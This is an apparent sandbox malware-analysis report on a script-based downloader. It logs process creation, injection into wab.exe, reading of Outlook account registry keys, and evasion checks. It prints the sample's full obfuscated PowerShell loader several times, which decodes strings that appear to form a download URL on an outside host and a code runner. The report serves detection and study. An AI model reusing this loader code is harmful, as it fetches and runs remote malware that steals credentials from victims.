                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: Binary string: indows\System.Core.pdb* source: powershell.exe, 00000005.00000002.2444255599.00000000076F9000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Sky", "0")
                Source: Yara match | File source: 00000005.00000002.2447423096.000000000B13D000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2447272423.00000000089C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2442003706.0000000005E33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Skylining)$global:Juvenolatry = [System.Text.Encoding]::ASCII.GetString($Missis)$global:Caprinic=$Juvenolatry.substring($Substanced,$Destructors)<#Spejlreflekskameraet Reendowment Po
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Baldoquin $Tritheistical $Afgrnsninger113), (Ateisternes @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Trrede = [AppDomain]::CurrentDomain.GetAssemblies(
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Menispermum)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Filtrerpapirers, $false).DefineType($Nordstli
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($Skylining)$global:Juvenolatry = [System.Text.Encoding]::ASCII.GetString($Missis)$global:Caprinic=$Juvenolatry.substring($Substanced,$Destructors)<#Spejlreflekskameraet Reendowment Po
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 11_2_004044A4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848F000BD pushad ; iretd 2_2_00007FF848F000C1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FF848FD5479 push ebp; iretd 2_2_00007FF848FD5538
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_07751FB2 push eax; mov dword ptr [esp], ecx 5_2_077521B4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0775EC6C push FFFFFFE8h; retf 5_2_0775EC71
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08573872 pushfd ; retf 5_2_08573881
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0857386A pushad ; retf 5_2_08573871
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0857369D push ebx; iretd 5_2_085736DA
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C2806 push ecx; ret 8_2_240C2819
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044693D push ecx; ret 11_2_0044694D
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00451D54 push eax; ret 11_2_00451D61
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B090 push eax; ret 13_2_0044B0CC
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00451D34 push eax; ret 13_2_00451D41
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00444E71 push ecx; ret 13_2_00444E81
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414060 push eax; ret 14_2_00414074
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414060 push eax; ret 14_2_0041409C
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00414039 push ecx; ret 14_2_00414049
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004164EB push 0000006Ah; retf 14_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00416553 push 0000006Ah; retf 14_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00416555 push 0000006Ah; retf 14_2_004165C4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 13_2_004047CB
                Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Program Files (x86)\Windows Mail\wab.exe | API/Special instruction interceptor: Address: 5EFE35F
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle | 11_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4474
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5437
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7129
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2657
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 5183
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: threadDelayed 4270
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Window / User API: foregroundWindowGot 1769
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | API coverage: 9.5 %
                Source: C:\Windows\System32\wscript.exe TID: 1816 | Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6564 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444 | Thread sleep count: 7129 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4708 | Thread sleep count: 2657 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576 | Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1784 | Thread sleep count: 244 > 30
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1784 | Thread sleep time: -122000s >= -30000s
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920 | Thread sleep count: 5183 > 30
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920 | Thread sleep time: -15549000s >= -30000s
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920 | Thread sleep count: 4270 > 30
                Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3920 | Thread sleep time: -12810000s >= -30000s
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 8_2_240C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 8_2_240C10F1
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 8_2_240C6580 FindFirstFileExA | 8_2_240C6580
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW | 11_2_0040AE51
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen | 13_2_00407EF8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen | 14_2_00407898
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_00418981 memset,GetSystemInfo | 11_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                Source: wscript.exe, 00000000.00000003.1997590256.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002665387.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998011593.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001506645.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000868107.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000627783.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001147023.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWXNi
                Source: wscript.exe, 00000000.00000003.2000598221.00000203A2F9C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: wscript.exe, 00000000.00000003.1997590256.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002665387.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998011593.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001506645.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000868107.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000627783.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2001147023.00000203A2F6A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2719854612.00000192FC9F0000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000002.2002370211.00000203A116B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998069751.00000203A1123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998183309.00000203A114B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2000490789.00000203A116B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | API call chain: ExitProcess graph end node | graph_13-34119
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 8_2_240C8EC8 LdrInitializeThunk | 8_2_240C8EC8
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 8_2_240C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 8_2_240C60E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle | 11_2_0040DD85
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW | 11_2_004044A4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 8_2_240C4AB4 mov eax, dword ptr fs:[00000030h] | 8_2_240C4AB4
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 8_2_240C724E GetProcessHeap | 8_2_240C724E
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 8_2_240C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 8_2_240C60E2
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 8_2_240C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 8_2_240C2639
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Code function: 8_2_240C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 8_2_240C2B1C

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: amsi64_3528.amsi.csv, type: OTHER
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3528, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1084, type: MEMORYSTR
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
                Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3CE0000
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A7F808
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. 
Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Angiosperm.Afm && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. 
